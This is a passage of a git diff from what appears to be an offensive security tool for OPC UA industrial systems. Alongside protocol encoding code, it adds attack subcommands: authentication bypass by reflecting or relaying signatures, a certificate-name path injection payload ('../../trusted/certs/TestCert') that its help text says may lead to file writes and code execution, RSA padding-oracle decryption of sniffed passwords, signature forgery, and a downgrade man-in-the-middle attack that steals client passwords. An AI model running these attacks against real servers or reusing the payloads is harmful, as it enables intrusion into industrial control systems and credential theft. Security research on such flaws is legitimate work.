outlen)): + result[ix] = j % 256 + j //= 256 + + if j != 0: + raise ValueError(f'{value} does not fit in {outlen} bytes.') + return bytes(result) + +@cache +def arbitrary_keypair(bits : int) -> RsaKey: + return RSA.generate(bits) + +def decode_oaep_padding(payload : bytes, hashfunc : str) -> Optional[bytes]: + # Can't find a good OAEP decoding implementation right now (crypto libraries don't seem to expose unpadding + # separately), and implementing it seems a bit of a pain to test and debug, so let's just cheat by encrypting and + # decrypting it with an arbitrary key pair. + keypair = arbitrary_keypair(len(payload) * 8) + + hasher = { + 'sha1': SHA1, + 'sha256': SHA256 + }[hashfunc] + m = 0 + for by in payload: + m *= 256 + m += by + + try: + return PKCS1_OAEP.new(keypair, hasher).decrypt(int2bytes(pow(m, keypair.e, keypair.n), len(payload))) + except: + return None + +def remove_rsa_padding(payload : bytes, policy : SecurityPolicy) -> Optional[bytes]: + # Decode RSA padding based on security policy. Returns None if padding is incorrect. + assert policy != SecurityPolicy.NONE + if policy == SecurityPolicy.BASIC128RSA15: + if payload.startswith(b'\x00\x02') and b'\x00' not in payload[2:9] and b'\x00' in payload[10:]: + return payload[(payload[10:].find(b'\x00') + 11):] + else: + return None + elif policy == SecurityPolicy.AES256_SHA256_RSAPSS: + return decode_oaep_padding(payload, 'sha256') + else: + return decode_oaep_padding(payload, 'sha1') + +def pkcs1v15_signature_encode(hasher, msg, outlen): + # RFC 3447 signature encoding. + PKCS_HASH_IDS = { + 'sha1': b'\x30\x21\x30\x09\x06\x05\x2b\x0e\x03\x02\x1a\x05\x00\x04\x14', + 'sha256': b'\x30\x31\x30\x0d\x06\x09\x60\x86\x48\x01\x65\x03\x04\x02\x01\x05\x00\x04\x20', + 'sha384': b'\x30\x41\x30\x0d\x06\x09\x60\x86\x48\x01\x65\x03\x04\x02\x02\x05\x00\x04\x30', + 'sha512': b'\x30\x51\x30\x0d\x06\x09\x60\x86\x48\x01\x65\x03\x04\x02\x03\x05\x00\x04\x40', + } + + mhash = hashlib.new(hasher, msg).digest() + suffix = PKCS_HASH_IDS[hasher] + mhash + padding = b'\xff' * (outlen - len(suffix) - 3) + return b'\x00\x01' + padding + b'\x00' + suffix \ No newline at end of file diff --git a/message_fields.py b/message_fields.py index a5cec5a..f4498eb 100644 --- a/message_fields.py +++ b/message_fields.py @@ -1,12 +1,14 @@ -from abc import ABC +from abc import ABC, abstractmethod import struct from typing import * -from enum import Enum, auto +from types import NoneType +from enum import Enum, auto, IntEnum from datetime import datetime, timedelta from binascii import hexlify from collections import namedtuple from base64 import b64encode, b64decode from uuid import UUID +from dataclasses import dataclass # Type vars. ValType = TypeVar('ValType') @@ -17,6 +19,13 @@ class DecodeError(Exception): pass +# Thrown by from_bytes when an unexpected OPC error message is encountered. +class ServerError(Exception): + def __init__(self, errorcode, reason): + super().__init__(f'Server error {hex(errorcode)}: "{reason}"') + self.errorcode = errorcode + self.reason = reason + def decodecheck(condition : bool, msg : str = 'Invalid OPC message syntax'): if not condition: raise DecodeError(msg) @@ -103,25 +112,29 @@ def __init__(self, intformat : str = ' ValType: def untransform(self, transformed : ValType) -> OriginalValType: ... + @property def default_value(self): return self.transform(self._origfield.default_value) @@ -153,31 +167,30 @@ def to_bytes(self, value): return self._origfield.to_bytes(self.untransform(value)) def from_bytes(self, bytestr): - val, rest = self.origfield.from_bytes(bytestr) + val, rest = self._origfield.from_bytes(bytestr) return self.transform(val), rest -class StringField(TransformedFieldType[bytes, Optional[str]]): +class StringField(TransformedFieldType[Optional[bytes], Optional[str]]): """"OPC Null string is translated to Python None.""" def __init__(self): super().__init__(ByteStringField()) def transform(self, original): - return original.decode() if original != b'\xff\xff\xff\xff' else None + return original.decode() if original is not None else None def untransform(self, transformed): - return transformed.encode() if transformed is not None else b'\xff\xff\xff\xff' + return transformed.encode() if transformed is not None else None class DateTimeField(TransformedFieldType[int, Optional[datetime]]): def __init__(self): super().__init__(IntField(' bool: + return NodeIdField().from_bytes(bytestr)[0].identifier == self._id class EnumField(TransformedFieldType[int, IntEnum]): def __init__(self, EnumType : Type[IntEnum]): super().__init__(IntField()) self._EnumType = EnumType - + + @property def default_value(self): return next(iter(self._EnumType.__members__)) @@ -385,22 +429,23 @@ def from_bytes(self, bytestr): class SwitchableObjectField(FieldType[NamedTuple]): # Object that starts with (byte-aligned) mask of which of its fields are present. def __init__(self, name : str, bodyfields : list[tuple[str, FieldType, int]]): - self._bodyfields = bodyfields + self._fieldtypes = [(fname, ftype) for fname, ftype, _ in bodyfields] self._Body = namedtuple(name, [fname for fname, _, _ in bodyfields]) self._masksize = len(bodyfields) + (8 - len(bodyfields) % 8 if len(bodyfields) % 8 else 0) self._maskindices = {fname: index for fname, _, index in bodyfields} + @property def default_value(self): - return self._Body(**{fname: None for fname, _ in self._bodyfields}) + return self._Body(**{fname: None for fname, _ in self._fieldtypes}) def to_bytes(self, value): mask = 0 bodybytes = b'' - for fname, ftype in self._bodyfields: + for fname, ftype in self._fieldtypes: element = getattr(value, fname) if element is not None: - mask |= 1 << (self._masksize - self._maskindices[fname]) + mask |= 1 << self._maskindices[fname] bodybytes += ftype.to_bytes(element) maskbytes = bytes(((mask >> i) % 256 for i in range(0, self._masksize, 8))) @@ -408,21 +453,21 @@ def to_bytes(self, value): def from_bytes(self, bytestr): mask = 0 - for maskbyte in bytestr[:self._masksize]: + for maskbyte in bytestr[:self._masksize // 8]: mask *= 256 mask += maskbyte - todo = bytestr[self._masksize:] + todo = bytestr[self._masksize // 8:] - result = self._Body() - for fname, ftype in self._bodyfields: - if (mask >> (self._masksize - self._maskindices[fname])) & 1: + attributes = {} + for fname, ftype in self._fieldtypes: + if (mask >> self._maskindices[fname]) & 1: bodyval, todo = ftype.from_bytes(todo) else: bodyval = None - setattr(result, fname, bodyval) - - return result, todo + attributes[fname] = bodyval + + return self._Body(**attributes), todo class BooleanField(TransformedFieldType[int, bool]): def __init__(self): @@ -438,6 +483,7 @@ class FixedSizeBytesField(FieldType[bytes]): def __init__(self, size): self._size = size + @property def default_value(self): return b'\x00' * self._size @@ -453,7 +499,8 @@ def __init__(self, name): def fail(): raise UnsupportedFieldException(name, f'Field type {name} is not supported.') self._fail = fail - + + @property def default_value(self): self._fail() @@ -463,23 +510,71 @@ def to_bytes(self, value): def from_bytes(self, bytestr): self._fail() +# Extension objects. See https://reference.opcfoundation.org/Core/Part6/v104/docs/5.2.2.15 +# Call register_object to expand. +class ExtensionObjectField(FieldType[Optional[NamedTuple]]): + _id2ft = {} + _ty2id = {} + + @classmethod + def register(clazz, name : str, identifier : int, bodyfields : list[tuple[str, FieldType]]) -> FieldType: + fieldType = ObjectField(name, bodyfields) + assert identifier not in clazz._id2ft + clazz._id2ft[identifier] = fieldType + clazz._ty2id[fieldType.Type] = identifier + return fieldType + + default_value = None + + def to_bytes(self, value): + if value is None: + return NodeIdField().to_bytes(NodeId(0,0)) + b'\x00' + elif type(value) in ExtensionObjectField._ty2id: + identifier = ExtensionObjectField._ty2id[type(value)] + fieldType = ExtensionObjectField._id2ft[identifier] + return NodeIdField().to_bytes(NodeId(0,identifier)) + b'\x01' + ByteStringField().to_bytes(fieldType.to_bytes(value)) + else: + raise Exception(f'Type {type(value)} not registered as extension object.') + + def from_bytes(self, bytestr): + nodeId, todo = NodeIdField().from_bytes(bytestr) + decodecheck(nodeId.namespace == 0) + identifier = nodeId.identifier + decodecheck(todo) + encoding, todo = todo[0], todo[1:] + decodecheck(encoding != 2, 'XML encoding not supported.') + if encoding == 0: + bodybytes = b'' + elif encoding == 1: + bodybytes, todo = ByteStringField().from_bytes(todo) + else: + decodecheck(False) + + if identifier == 0: + return None, todo + else: + decodecheck(identifier in ExtensionObjectField._id2ft, f'Extension object type ID {identifier} not registered.') + fieldType = ExtensionObjectField._id2ft[identifier] + value, _ = fieldType.from_bytes(bodybytes) + return value, todo + QualifiedNameField = lambda: ObjectField('QualifiedName', [ ('namespaceIndex', IntField('> 2 - decodecheck(identifier in VariantField.TYPE_IDS) - decodecheck(mask & 0b00000010 != 0, 'Variant array dimensions not supported.') + identifier = mask & 0b00111111 + decodecheck(identifier in VariantField._TYPE_IDS) - fieldType = VariantField.TYPE_IDS[identifier] - if mask & 0b00000001: - return ArrayField(fieldType).from_bytes(todo) + fieldType = VariantField._TYPE_IDS[identifier] + if mask & 0b10000000: + result, todo = ArrayField(fieldType).from_bytes(todo) else: - return fieldType.from_bytes(todo) - - -# Extension objects. See https://reference.opcfoundation.org/Core/Part6/v104/docs/5.2.2.15 -# Call register_object to expand. -class ExtensionObjectField(FieldType[Optional[NamedTuple]]): - _id2ft = {} - _ty2id = {} - - @classmethod - def register(clazz, name : str, identifier : int, bodyfields : list[tuple[str, FieldType]]) -> FieldType: - fieldType = EncodableObjectField(name, identifier, bodyfields) - assert identifier not in _id2ft - clazz._id2ft[identifier] = fieldType - clazz._ty2id[fieldType.Type] = identifier - return fieldType - - default_value = None + result, todo = fieldType.from_bytes(todo) - def to_bytes(self, value): - if value is None: - return NodeIdField().to_bytes(0) + b'\x00' - elif type(value) in ExtensionObjectField._ty2id: - identifier = ExtensionObjectField._ty2id[type(value)] - fieldType = ExtensionObjectField._id2ft[identifier] - return NodeIdField().to_bytes(identifier) + b'\x01' + ByteStringField().to_bytes(fieldType.to_bytes(value)) - else: - raise Exception(f'Type {type(value)} not registered as extension object.') + if mask & 0b01000000: + # For now, just drop dimension info and return flattened array. + dimensions, todo = IntField().from_bytes(todo) + for _ in range(0, dimensions): + _, todo = IntField().from_bytes(todo) - def from_bytes(self, bytestr): - identifier, todo = NodeIdField().from_bytes(bytestr) - decodecheck(todo) - encoding, todo = todo[0], todo[1:] - decodecheck(encoding != 2, 'XML encoding not supported.') - if encoding == 0: - bodybytes = b'' - elif encoding == 1: - bodybytes, todo = ByteStringField().from_bytes(todo) - else: - decodecheck(False) + return result, todo - if identifier == 0: - return None, todo - else: - decodecheck(identifier in ExtensionObjectField._id2ft, f'Extension object type ID {identifier} not registered.') - fieldType = ExtensionObjectField._id2ft[identifier] - value, _ = fieldType.from_bytes(bodybytes) - return value, todo \ No newline at end of file + +VariantField._TYPE_IDS[23] = DataValueField() +VariantField._TYPE_IDS[24] = VariantField() diff --git a/messages.py b/messages.py index 252f6cb..4519713 100644 --- a/messages.py +++ b/messages.py @@ -3,6 +3,11 @@ from abc import ABC import struct from typing import * +from dataclasses import dataclass + +# Exception signifying rgar a CloseSecureChannelRequest was received when expecting something else. +class ClientClosedChannel(Exception): + pass # Main "outer" messages. @@ -21,8 +26,9 @@ def messagetype() -> str: def fields() -> list[tuple[str, FieldType]]: ... - def to_bytes(self, chunksize : int = -1) -> bytes: + def to_bytes(self, final_chunk : bool = True) -> bytes: mtype = self.messagetype.encode() + chunkmarker = b'F' if final_chunk else b'C' assert len(mtype) == 3 body = b'' @@ -30,34 +36,40 @@ def to_bytes(self, chunksize : int = -1) -> bytes: value = getattr(self, name) body += ftype.to_bytes(value) - if chunksize <= 0: - bodychunks = [body] - else: - bodychunks = [body[i:i+chunksize] for i in range(0, len(body), chunksize)] - - bodychunks = [struct.pack(' bool: + # Note: when this throws a ServerError the message is still consumed in its entirety from the reader. + # Returns whether this is the final chunk. + mtype = reader.read(3) - decodecheck(mtype == self.messagetype.encode(), 'Unexpected message type') + decodecheck(len(mtype) == 3, 'Connection unexpectedly terminated.') + decodecheck(mtype == self.messagetype.encode() or mtype in [b'ERR',b'CLO'], 'Unexpected message type') - body = b'' ctype = reader.read(1) - while ctype == b'C': - chunklen = struct.unpack(' int: '''Returns binary (offset, length) of a specific field within the result of self.to_bytes()''' @@ -73,6 +85,48 @@ def get_field_location(self, fieldname : str) -> int: raise Exception(f'Field {fieldname} does not exist.') + def sign_and_encrypt(self, + signer : Callable[[bytes], bytes], encrypter : Optional[Callable[[bytes], bytes]], + plainblocksize : int, cipherblocksize : int, sigsize : int + ): + '''Applies OPC's weird padding scheme and sign/encrypt combo to TrailingBytes of the message.''' + + trailname, trailtype = self.fields[-1] + assert isinstance(trailtype, TrailingBytes) + plaintext = getattr(self, trailname) + + # Length calculations. + padbyte = plainblocksize - (len(plaintext) + 1 + sigsize) % plainblocksize + if padbyte < 256: + padding = (padbyte + 1) * bytes([padbyte]) + else: + padding = (padbyte + 1) * bytes([padbyte % 256]) + bytes([padbyte // 256]) + ptextsize = len(plaintext) + len(padding) + sigsize + ctextsize = (ptextsize // plainblocksize) * cipherblocksize + + # Add padding and adjust length to obtain signature input. + setattr(self, trailname, plaintext + padding) + siginput = self.to_bytes() + siginput = siginput[:4] + IntField().to_bytes(len(siginput) - len(plaintext) - len(padding) + ctextsize) + siginput[8:] + signature = signer(siginput) + + # Encrypt plaintext, padding and signature. + ciphertext = encrypter(plaintext + padding + signature) + assert len(ciphertext) == ctextsize + setattr(self, trailname, ciphertext) + + assert(len(self.to_bytes()) == len(siginput) - len(plaintext) - len(padding) + ctextsize) + + def sign(self, signer : Callable[[bytes], bytes], sigsize : int): + '''Message signing without encryption and padding.''' + trailname, trailtype = self.fields[-1] + assert isinstance(trailtype, TrailingBytes) + siginput = self.to_bytes() + siginput = siginput[:4] + IntField().to_bytes(len(siginput) + sigsize) + siginput[8:] + signature = signer(siginput) + setattr(self, trailname, getattr(self, trailname) + signature) + + # Messages. class HelloMessage(OpcMessage): @@ -103,9 +157,7 @@ class OpenSecureChannelMessage(OpcMessage): ('securityPolicyUri', SecurityPolicyField()), ('senderCertificate', ByteStringField()), ('receiverCertificateThumbprint', ByteStringField()), - ('sequenceNumber', IntField()), - ('requestId', IntField()), - ('encryptedMessage', TrailingBytes()), + ('encodedPart', TrailingBytes()), ] class ConversationMessage(OpcMessage): @@ -116,6 +168,13 @@ class ConversationMessage(OpcMessage): ('encodedPart', TrailingBytes()) ] +class ReverseHelloMessage(OpcMessage): + messagetype = 'RHE' + fields = [ + ('serverUri', StringField()), + ('endpointUrl', StringField()), + ] + encodedConversation = ObjectField('EncodedConversation', [ ('sequenceNumber', IntField()), ('requestId', IntField()), @@ -179,7 +238,7 @@ class NodeClass(IntEnum): ('returnDiagnostics', IntField()), ('auditEntryId', StringField()), ('timeoutHint', IntField()), - ('additionalHeader', ExtensionObjectField(0, TrailingBytes())), + ('additionalHeader', ExtensionObjectField()), ]) responseHeader = ObjectField('ResponseHeader', [ @@ -188,7 +247,7 @@ class NodeClass(IntEnum): ('serviceResult', IntField()), ('serviceDiagnostics', FixedBytes(b'\x00')), # Just assume this stays empty for now. ('stringTable', ArrayField(StringField())), - ('additionalHeader', ExtensionObjectField(0, TrailingBytes())), + ('additionalHeader', ExtensionObjectField()), ]) applicationDescription = ObjectField('ApplicationDescription', [ @@ -211,15 +270,17 @@ class NodeClass(IntEnum): ('requestedLifetime', IntField()), ]) +channelSecurityToken = ObjectField('ChannelSecurityToken', [ + ('channelId', IntField()), + ('tokenId', IntField()), + ('createdAt', DateTimeField()), + ('revisedLifetime', IntField()), +]) + openSecureChannelResponse = EncodableObjectField('OpenSecureChannelResponse', 449, [ ('responseHeader', responseHeader), ('serverProtocolVersion', IntField()), - ('securityToken', EncodableObjectField('ChannelSecurityToken', 443, [ - ('channelId', IntField()), - ('tokenId', IntField()), - ('createdAt', DateTimeField()), - ('revisedLifetime', IntField()), - ])), + ('securityToken', channelSecurityToken), ('serverNonce', ByteStringField()), ]) @@ -227,6 +288,7 @@ class NodeClass(IntEnum): ('requestHeader', requestHeader), ('clientDescription', applicationDescription), ('serverUri', StringField()), + ('endpointUrl', StringField()), ('sessionName', StringField()), ('clientNonce', ByteStringField()), ('clientCertificate', ByteStringField()), @@ -234,19 +296,21 @@ class NodeClass(IntEnum): ('maxResponseMessageSize', IntField()), ]) +userTokenPolicy = ObjectField('UserTokenPolicy', [ + ('policyId', StringField()), + ('tokenType', EnumField(UserTokenType)), + ('issuedTokenType', StringField()), + ('issuerEndpointUrl', StringField()), + ('securityPolicyUri', SecurityPolicyField()), +]) + endpointDescription = ObjectField('EndpointDescription', [ ('endpointUrl', StringField()), ('server', applicationDescription), ('serverCertificate', ByteStringField()), ('securityMode', EnumField(MessageSecurityMode)), ('securityPolicyUri', SecurityPolicyField()), - ('userIdentityTokens', ArrayField(ObjectField('UserTokenPolicy', [ - ('policyId', StringField()), - ('tokenType', EnumField(UserTokenType)), - ('issuedTokenType', StringField()), - ('issuerEndpointUrl', StringField()), - ('securityPolicyUri', SecurityPolicyField()), - ]))), + ('userIdentityTokens', ArrayField(userTokenPolicy)), ('transportProfileUri', StringField()), ('securityLevel', IntField(' str: ... @abstractmethod - def add_arguments(aparser : ArgumentParser): + def add_arguments(self, aparser : ArgumentParser): """Add attack-specific options.""" ... @@ -43,6 +42,56 @@ def execute(self, args : Namespace): """Executes the attack, given specified options.""" ... +def add_padding_oracle_args(aparser : ArgumentParser): + """Adds arguments to configure a padding oracle attack""" + aparser.add_argument('-t', '--padding-oracle-type', choices=('opn', 'password', 'try-both'), default='try-both', + help='which PKCS#1 padding oracle to use with --bypass-opn; default: try-both') + aparser.add_argument('-T', '--timing-attack-threshold', type=float, metavar='INTERVAL', default=0, + help='if set, will try a timing-based padding oracle with this threshold parameter (fractional; in seconds); use check -t to help determine this') + aparser.add_argument('-C', '--timing-attack-expansion', type=int, metavar='COUNT', default=50, + help='when used alongside -T this determines the ciphertext expansion parameter; default: 50') + +def add_mitm_args(aparser : ArgumentParser): + """Common arguments for MitM attacks.""" + def address_arg(arg): + [host, port] = arg.split(':') + return host or '0.0.0.0', int(port) + + aparser.add_argument('-r', '--reverse-hello', type=address_arg, metavar='client-host:port', + help='if set, will sent a ReverseHello to connect to the client') + aparser.add_argument('-p', '--persist', action='store_true', + help='keep listening for incoming connections after starting an attack') + aparser.add_argument('[listen-address]:port', type=address_arg, + help='address to bind to to listen for incoming connections; when -r is set this is instead used as an endpointUrl in the ReverseHello message') + aparser.add_argument('server-url', type=str, + help='OPC URL of a (discovery) server whose certificate the client is expected to trust') + + +class CheckAttack(Attack): + subcommand = 'check' + short_help = 'evaluate whether attacks apply to server' + long_help = """ +Simply requests a list of endpoints from the server, and report which attacks +may be applicable based on their configuration. This does not prove the +endpoints are vulnerable, but helps testing a connection and determining which +attacks are worth trying. + +By default, this will be non-intrusive and only request and endpoint list. With +--probe-password and --test-timing-attack you can enable nosier checks that may +yield additional results. + +Most important results are printed to stdout. Rest to stderr. +""" + + def add_arguments(self, aparser): + aparser.add_argument('-t', '--test-timing-attack', action='store_true', + help='test vulnerability to timing-based padding oracle by sending a bunch of ciphertexts and timing responses; output can be helpful when picking a timing attack threshold parameter') + aparser.add_argument('url', + help='Target or discovery server OPC URL (either opc.tcp:// or https:// protocol)', + type=str) + + def execute(self, args): + server_checker(args.url, args.test_timing_attack) class ReflectAttack(Attack): subcommand = 'reflect' @@ -61,34 +110,44 @@ class ReflectAttack(Attack): then copied to the ActivateSessionRequest back on the main session, taking advantage of the lack of domain separation between client and server signatures. -If the server requires user authentication on top of client authentication, the -same technique is attempted to spoof a user certificate. The attack won't work -if password-based authentication is required. - -By default the tool will attempt to negotiate the "None" security policy. If -the server does not accept this the tool will instead try to perform the -OpenSecureChannel handshake with an arbitrary self-signed certificate. If that -doesn't work either, you can try bypass the handshake by supplying the -result of a "opnforge" attack via the --forged-opn option. Alternatively, -you can supply your own certificate and private key (e.g. signed via the -WebPKI or taken from a compromised system) via --opn-cert and --opn-key. +If the server requires user authentication on top of client instance +authentication, the same technique is attempted to spoof a user certificate. +The attack won't work if password-based authentication is required. + +The default form of the attack only works against servers that support an HTTPS +endpoint. If that is not the case, you can use the --bypass-opn flag to try and +use the RSA PKCS#1 padding oracle (used by 'decrypt' and 'sigforge' +attacks) to get through the initial OpenSecureChannel handshake. This attack +will need to perform two full padding oracle decryptions: one for forging a +signature on a OPN request, and the other to decrypt the response. The result +of the signature forgery is reusable, while the second needs to take place +during the lifetime of an authentication token (the duration of which the tool +will try to maximize). """.strip() - def add_arguments(aparser): - aparser.add_arguments('-o', '--forged-opn', - help_text='result of a prior opnforge attack against the server') - aparser.add_arguments('-c', '--opn-cert', - help_text='alternative certificate to use for the OPN handshake') - aparser.add_arguments('-k', '--opn-key', - help_text='private key associated with --opn-cert certificate') - - aparser.add_arguments('address', metavar='host:port', - help_text='Target server address', - type=address_arg) + def add_arguments(self, aparser): + aparser.add_argument('-n', '--no-demo', action='store_true', + help='don\'t dump server contents on success; just tell if attack worked') + aparser.add_argument('-b', '--bypass-opn', action='store_true', + help='when no HTTPS is available, attempt to use sigforge and decrypt attacks to bypass the opc.tcp secure channel handshake') + aparser.add_argument('-c', '--cache-file', type=Path, default='.opncache.json', + help='file in which to cache OPN requests with spoofed signatures; default: .opncache.json') + add_padding_oracle_args(aparser.add_argument_group('padding oracle parameters', '(applicable if --bypass-opn is set)')) - def execute(self, args): - # TODO: OPN/cert options - reflect_attack(args.address) + aparser.add_argument('url', + help='Target server OPC URL (either opc.tcp:// or https:// protocol)', + type=str) + + def execute(self, args): + reflect_attack( + args.url, + not args.no_demo, + args.bypass_opn and args.padding_oracle_type != 'password', + args.bypass_opn and args.padding_oracle_type != 'opn', + args.cache_file, + args.timing_attack_threshold, + args.timing_attack_expansion + ) class RelayAttack(Attack): subcommand = 'relay' @@ -97,97 +156,231 @@ class RelayAttack(Attack): Tricks one server A to log you in to server B with A's identity. This uses the same technique as the reflection attack, except that the two -sessions are set up against different servers. - -For the attack to work, an OpenSecureChannel handshake needs to be done with -both servers. By default, the tool will try either negotiating an unencrypted -session or using a self-signed certificate for this step. If neither works, -you can use the "opnforge" attack against either or both servers. -Just like with the reflection attack. It is also possible to supply an -alternative certificate for OPN. +sessions are set up against different servers. See reflect --help for more +information. """.strip() - def add_arguments(aparser): - aparser.add_arguments('-a', '--forged-opn-a', - help_text='result of a prior opnforge attack against server-a') - aparser.add_arguments('-b', '--forged-opn-b', - help_text='result of a prior opnforge attack against server-b') - aparser.add_arguments('-c', '--opn-cert', - help_text='alternative certificate to use for the OPN handshake') - aparser.add_arguments('-k', '--opn-key', - help_text='private key associated with --opn-cert certificate') - - aparser.add_arguments('server-a', - help_text='host:port of the server of which to spoof the identity', - type=address_arg) - aparser.add_arguments('server-b', - help_text='host:port of the server on which to log in asserver-a', - type=address_arg) + def add_arguments(self, aparser): + aparser.add_argument('-n', '--no-demo', action='store_true', + help='don\'t dump server contents on success; just tell if attack worked') + aparser.add_argument('-b', '--bypass-opn', action='store_true', + help='when no HTTPS is available on either or both servers, attempt to use sigforge and decrypt attacks to bypass the opc.tcp secure channel handshake') + aparser.add_argument('-r', '--reusable-opn-file', type=Path, default='.spoofed-opnreqs.json', + help='file in which to cache OPN requests with spoofed signatures; default: .spoofed-opnreqs.json') + add_padding_oracle_args(aparser.add_argument_group('padding oracle parameters', 'applicable if --bypass-opn is set')) + + aparser.add_argument('server-a', + help='OPC URL of the server of which to spoof the identity', + type=str) + aparser.add_argument('server-b', + help='OPC URL of the server on which to log in as server-a', + type=str) def execute(self, args): - # TODO: OPN/cert options - relay_attack(args.server_a, args.server_b) - -class SigForgeAttack(Attack): - subcommand = 'sigforge' - short_help = 'TODO: authentication bypass by signature forgery via a PKCS#1 padding oracle' + if args.bypass_opn: + raise Exception('TODO: --bypass-opn option implemented for reflect; but not yet for relay') + relay_attack(getattr(args, 'server-a'), getattr(args, 'server-b'), not args.no_demo) + +class PathInjectAttack(Attack): + subcommand = 'cn-inject' + short_help = 'path injection via an (untrusted) certificate CN' long_help = """ -TODO -""".strip() - - def add_arguments(aparser): - pass +Tries to connect with a self-signed client instance certificate that has a path +injection (or other) payload in the Common Name (CN) field. Takes advantage of +implementations that follow the recommended certificate store directory layout +(https://reference.opcfoundation.org/GDS/v105/docs/F.1) but don't do additional +input validation. + +You can supply any CN with the --cn flag. By default the payload +'../../trusted/certs/TestCert' is used, which attempts an authentication bypass +by getting the rejected cert placed in the trusted store instead. If this +works, then clearly the server is vulnerable, and you may be able to achieve +arbitrary file writes and RCE with other payloads. + +Supply --second-login to make the tool try a second loginattempt with the same +certificate, to check whether an authentication bypass payload has worked. +""" + + def add_arguments(self, aparser): + aparser.add_argument('-c', '--cn', type=str, default='../../trusted/certs/TestCert', + help='payload to put in CN; default: ../../trusted/certs/TestCert') + aparser.add_argument('-s', '--second-login', action='store_true', + help='log in a second time with the same certificate; useful for testing the default payload auth bypass') + aparser.add_argument('-n', '--no-demo', action='store_true', + help='don\'t dump server contents when an authentication bypass worked') + aparser.add_argument('url', type=str, + help='Target server OPC URL (either opc.tcp:// or https:// protocol)') + # TODO: some way to exploit AFW better by controlling certificate content + def execute(self, args): - raise Exception('TODO: implement') + inject_cn_attack(args.url, args.cn, args.second_login, not args.no_demo) + +class NoAuthAttack(Attack): + subcommand = 'auth-check' + short_help = 'tests if server allows unauthenticated access' + long_help = """ +This is not a new attack. Just a simple check to see whether a server allows +anonymous access without authentication; either via the None policy or by +automatically accepting untrusted certificates. -class OPNForgeAttack(Attack): - subcommand = 'opnforge' - short_help = 'TODO: signature forgery on an OpenSecureChannel message; enabling reflect/relay/sigforge/mitm against a server that enforces signing or encryption' +First, a login is attempted with the None policy and a reflected server +certificate (of which ownership does not need to be proven). If that fails, +a non-None policy is picked along with a self-signed certificate (same check as +cn-inject, but with a harmless CN). +""" + + def add_arguments(self, aparser): + aparser.add_argument('-n', '--no-demo', action='store_true', + help='don\'t dump server contents on success; just tell an unauthenticated session could be created') + aparser.add_argument('-c', '--cert-only', action='store_true', + help='only attempt to log in with a self-signed certificate; skip the None attempt') + aparser.add_argument('url', type=str, + help='Target server OPC URL (either opc.tcp:// or https:// protocol)') + + def execute(self, args): + auth_check(args.url, args.cert_only, not args.no_demo) + +class DecryptAttack(Attack): + subcommand = 'decrypt' + short_help = 'sniffed password and/or traffic decryption via padding oracle' long_help = """ -TODO +If an OPC UA server supports the Basic128Rsa15 policy, or accepts passwords +encrypted with the "rsa-1_5" algorithm, it is quite likely vulnerable for a +PKCS#1 padding oracle attack. This allows you to decrypt any RSA ciphertext +that was encrypted with that server's public key, even when that ciphertext was +using the otherwise secure OAEP padding scheme. To carry out this attack +you do however need to still be able to connect to this server, and it should +still be using the same public key. + +One use for this is to decrypt passwords that were transmitted over channel +using 'Sign' or 'None' message security. Another use is to extract channel +encryption session keys by decrypting nonces from the OPN handshake. However, +the latter is only possible if the client-side of the connection is also +operating as a server, and using the same public key for that purpose. + +Currently, the tool only supports decrypting hex-encoded raw payloads (although +it will attempt to parse a password token if the plaintext looks like one). You +can use Wireshark's "Copy as Hex stream" on +ActivateSessionRequest -> UserIdentityToken -> UserNameIdentityToken -> Password +to grab a password payload. """.strip() - def add_arguments(aparser): - pass + def add_arguments(self, aparser): + aparser.add_argument('url', type=str, + help='endpoint URL of the OPC UA server owning the RSA key pair the ciphertext was produced for') + aparser.add_argument('ciphertext', type=str, + help='hex-encoded RSA-encrypted ciphertext; either OAEP or PKCS#1') + add_padding_oracle_args(aparser) def execute(self, args): - raise Exception('TODO: implement') + opn, password = { + 'opn' : (True, False), + 'password': (False, True), + 'try-both': (True, True), + }[args.padding_oracle_type] + decrypt_attack(args.url, unhexlify(args.ciphertext), opn, password, args.timing_attack_threshold, args.timing_attack_expansion) + -class DecryptAttack(Attack): - subcommand = 'decrypt' - short_help = 'TODO: sniffed password and/or traffic decryption via a PKCS#1 padding oracle' +class SigForgeAttack(Attack): + subcommand = 'sigforge' + short_help = 'signature forgery via padding oracle' long_help = """ -TODO +Uses the same padding oracle attack as 'decrypt', but instead of decrypting a +ciphertext an RSA PKCS#1 signature is forged with the private key that a server +is using. + +The technique can also be used to forge PSS signatures, but that's +currently not implemented. + +Is used automatically as part of reflect/relay attacks (with --bypass-opn). +This command can be used to sign any other arbitrary payload. Can be used +to show the concept in isolation or perform some follow-up attack. """.strip() - def add_arguments(aparser): - pass + def add_arguments(self, aparser): + aparser.add_argument('-H', '--hash-function', choices=('sha1', 'sha256'), default='sha256', + help='hash function to use in signature computation; default: sha256') + add_padding_oracle_args(aparser) + aparser.add_argument('url', type=str, + help='endpoint URL of the OPC UA server whose private key to spoof a signature with') + aparser.add_argument('payload', type=str, + help='hex-encoded payload to spoof a signature on') def execute(self, args): - raise Exception('TODO: implement') + opn, password = { + 'opn' : (True, False), + 'password': (False, True), + 'try-both': (True, True), + }[args.padding_oracle_type] + forge_signature_attack(args.url, unhexlify(args.payload), opn, password, SecurityPolicy.BASIC128RSA15 if args.hash_function == 'sha1' else SecurityPolicy.BASIC256, args.timing_attack_threshold, args.timing_attack_expansion) -class MitMAttack(Attack): - subcommand = 'mitm' - short_help = 'TODO: active MitM attack on an intercepted client-server connection' +class DowngradeMitmAttack(Attack): + subcommand = 'client-downgrade' + short_help = 'password stealing downgrade attack against a client' long_help = """ -TODO +This attack can be carried out when the tool can act as a server towards an OPC UA client. This is possible when +when the client either supports the ReverseHello mechanism, or when a network MitM position can be obtained (via. e.g. +ARP or DNS poisoning). + +The tool simply pretends to be a server that requires a password but only supports the None policy, attempting to get +the client to supply an unencrypted password. + +The server-url is used to fetch a certificate that the client is expected to trust. No further interactions are done +with the server. + +Currently only password stealing is implemented, but the same technique could be used to extract other authentication +material such as tokens or signed nonces. """.strip() - def add_arguments(aparser): - pass + def add_arguments(self, aparser): + add_mitm_args(aparser) def execute(self, args): - raise Exception('TODO: implement') + client_attack(nonegrade_mitm, getattr(args, 'server-url'), *getattr(args,'[listen-address]:port'), args.reverse_hello, args.persist) + +# Byte drop attack does not actually appear to work in practice +# class ByteDropMitmAttack(Attack): +# subcommand = 'client-bytedrop' +# short_help = 'password stealing downgrade attack against a client, using the "byte dropping" attack' +# long_help = """ +# Demonstrates the byte dropping MitM attack by modifying a signed server endpoint list such that is appears to request +# the client to supply an unencrypted password. + +# Takes advantage of the fact that HelloMessage parameters are unauthenticated to force the server to 